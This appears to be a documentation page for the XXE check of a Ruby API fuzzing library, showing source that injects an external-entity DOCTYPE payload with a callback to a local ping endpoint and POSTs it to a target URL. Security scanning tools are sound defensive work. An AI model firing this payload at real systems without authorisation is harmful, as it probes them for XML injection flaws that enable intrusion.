class API_Fuzzer::XxeCheck

Public Class Methods

scan(options = {}) click to toggle source
# File lib/API_Fuzzer/xxe_check.rb, line 8
def self.scan(options = {})
  @url = options[:url] || nil
  @params = options[:params]
  @scan_hash = options[:scan]
  @cookies = options[:cookies] || {}
  @headers = options[:headers] || {}
  fuzz_xml_params
end

Private Class Methods

fuzz_xml_params() click to toggle source
# File lib/API_Fuzzer/xxe_check.rb, line 19
    def self.fuzz_xml_params
      return unless @params
      body = params_serialize.gsub(/\>\s*[a-zA-Z0-9]*\s*\<\//, '>&xxe;<')
      payload = <<-XXEPAYLOAD

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:3000/ping/#{@scan_hash}" >]>
      XXEPAYLOAD
      payload << body
      API_Fuzzer::Request.send_api_request(
        url: @url,
        params: payload,
        body: true,
        method: :post,
        headers: @headers,
        cookies: @cookies
      )
    end
params_serialize() click to toggle source
# File lib/API_Fuzzer/xxe_check.rb, line 39
def self.params_serialize
  body = []
  @params.keys.each do |key, value|
    body << "#{key}=#{value}"
  end
  body.join('&')
end